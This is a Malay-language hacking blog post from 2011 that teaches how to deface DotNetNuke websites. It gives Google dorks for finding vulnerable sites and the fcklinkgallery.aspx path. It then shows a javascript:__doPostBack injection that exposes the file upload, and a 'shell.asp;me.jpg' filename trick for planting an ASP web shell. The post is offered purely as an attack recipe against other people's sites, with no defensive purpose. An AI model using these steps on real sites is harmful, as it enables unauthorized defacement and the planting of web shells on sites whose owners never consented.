Monday, 19 December 2011

Deface With DNN(DotNetNuke)




Assalamualaikum dan salam sejahtera...rasanya dah lama tak update blog kan??huhuhu...sorry yer....bz sket...baiklah hari ini aku nak ajar cara nak deface dengan DNN iaitu singkatan kepada DotNetNuke.Trick ni bole diketegorikan sebagai dah "lapuk".So ada sesetengah website ja yg masih vuln terhadap exploit ni.Tuto ni sebenarnya Zul Phc yg request.Baiklah aku pun malas nak terang2 lagi jom tngok step2 dibawah.


1. Cari vuln web dengan menggunakan google dork dibawah :

  • inurl:portals/0/
  • inurl:tabid/176/Default.aspx
  • inurl:fcklinkgallery.aspx
  • inurl:/fck/fcklinkgallery.aspx


Search di google dan pilih satu website.


2. Potong setengah link target seperti ini --> http://www.target.com/
3. Tambahkan exploit dibawah di URL dan tekan enter  :


/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx

Contoh : 



http://www.target.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx


4. Akan keluar seperti gambar dibawah :



5. Tandakan pada ---> File ( A File On Your Site )


Dan akan keluar seperti gambar dibawah  :


 


6. Kemudian padam SEMUA URL di address bar.

7. Masukkan JavaScript ini pada link yang dipadam tadi :



javascript:__doPostBack('ctlURL$cmdUpload','') 


ENTER!


note: bagi pengguna google chrome anda perlu type balik javascript ini...jika anda paste ianya tidak akan menjadi.


Dan akan keluar seperti gambar dibawah.perhatikan kotak merah :



8. Sekarang anda sudah dapat untuk upload file deace anda!
Choose file, pilih deface anda, dan tekan Upload Selected File.

Supported Files:

*. docx, *.xlsx, *.pptx, *.swf, *.jpg, *.jpeg, *.jpe, *.gif, *.bmp, *.png, *.doc, *.xls, *.ppt, *.pdf, *.txt, *.xml, *.xsl, *.css, *.zip, *.spin


note: anda jugak boleh mengupload shell asp dengan extension seperti ini : shell.asp;me.jpg

9. Untuk tngok hasil deface anda cuma perlu masukkan link seperti dibawah :

http://www.target.com/portals/0/defaceanda.txt


atau tengok shellhttp://www.target.com/portals/0/shell.asp;me.jpg


10. DONE!!!


Credit To : Newbie3viLc063s CrewIndiXperts

Baiklah itu sahaja untuk kali ini....semoga berjaya!!!Assalamualaikum...
Item Reviewed: Deface With DNN(DotNetNuke) Description: Rating: 5 Reviewed By Afif Zafri

Share:

Popular Posts

© 2011 - Reaperz All rights reserved | Theme Designed by Seo Blogger Templates DMCA.com